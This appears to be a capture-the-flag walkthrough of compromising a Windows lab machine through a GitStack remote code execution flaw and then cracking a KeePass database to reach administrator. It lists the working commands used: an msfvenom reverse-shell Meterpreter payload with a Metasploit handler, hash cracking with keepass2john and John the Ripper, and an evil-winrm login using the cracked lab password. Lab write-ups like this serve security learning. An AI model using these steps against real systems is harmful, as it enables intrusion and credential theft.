Premise
In this walk-through, we went over the windows box named stack and exploited a Gitstack application deployed on the web-server. We escalated our privileges by decrypting the password database.
Skills Learned
- Git-Stack Exploitation
- Windows Privilege Escalation
- Decryption of KeePass Database files .kdbx
Finding the Way In
My first step was to scan the target machine to see what services were running. I found an HTTP server and an SMB server. When I tried to access the web server, I got a “page not found” error, but the debug information gave me some juicy clues, including a few interesting directories: “registration,” “login,” and “gitstack.”
I started by exploring the “login” directory and found a default username and password of “admin/admin”. This was a great start! Next, I checked out the “gitstack” directory and discovered that it was running GitStack version 2.3.10. A quick search for exploits related to this version of GitStack revealed a remote code execution (RCE) vulnerability. This was my ticket in!
Getting a Foothold
I downloaded a Python script that exploited this vulnerability and modified it to include my IP address and the “admin/admin” credentials I had found earlier. I then used the exploit to run a few commands on the target machine, which confirmed that I was running as a user named “john.”
To get a more stable and powerful shell, I used a tool called Metasploit to generate a malicious payload. I then set up a simple web server on my machine to host this payload. I modified my exploit script one more time to tell the target machine to download and run my payload. As soon as it did, I got a Meterpreter session, which is a powerful type of shell that gives you a lot of control over the target machine.
Becoming the Admin
Now that I had a shell, my next goal was to become the administrator of the machine. I noticed a KeePass database file in “john’s” documents folder. KeePass is a password manager, so I knew this file probably contained some valuable credentials.
I downloaded the KeePass database file to my machine and used a tool called keepass2john
to extract the password hash from it. I then used another tool called John the Ripper to crack the hash. It didn’t take long to find the password: “princess”.
I installed KeePass on my machine and opened the database file using the password I had just found. Inside, I found the credentials for the administrator account! The password was “secure3apass262”.
With the administrator’s password in hand, I used a tool called evil-winrm
to log in to the machine as the administrator. I was now in full control of the “Stack” machine! 🚀
Commands I Used
Here are some of the key commands I used during this process:
- Scanning for services:
nmap
- Searching for exploits:
searchsploit
- Generating a malicious payload:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=4545 -f exe -o shell.exe
- Starting a simple web server:
python -m http.server
- Starting the Metasploit console:
msfconsole
- Using the multi-handler exploit:
use exploit/multi/handler
- Setting the payload:
set payload windows/meterpreter/reverse_tcp
- Downloading a file from the target machine:
download "Password Manager.kdbx"
- Extracting the hash from a KeePass database:
keepass2john "Password Manager.kdbx" > hash
- Cracking the hash with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash
- Logging in as the administrator:
evil-winrm -i <IP> -u administrator -p 'secure3apass262'
- Checking the current user:
whoami
Video Walk-through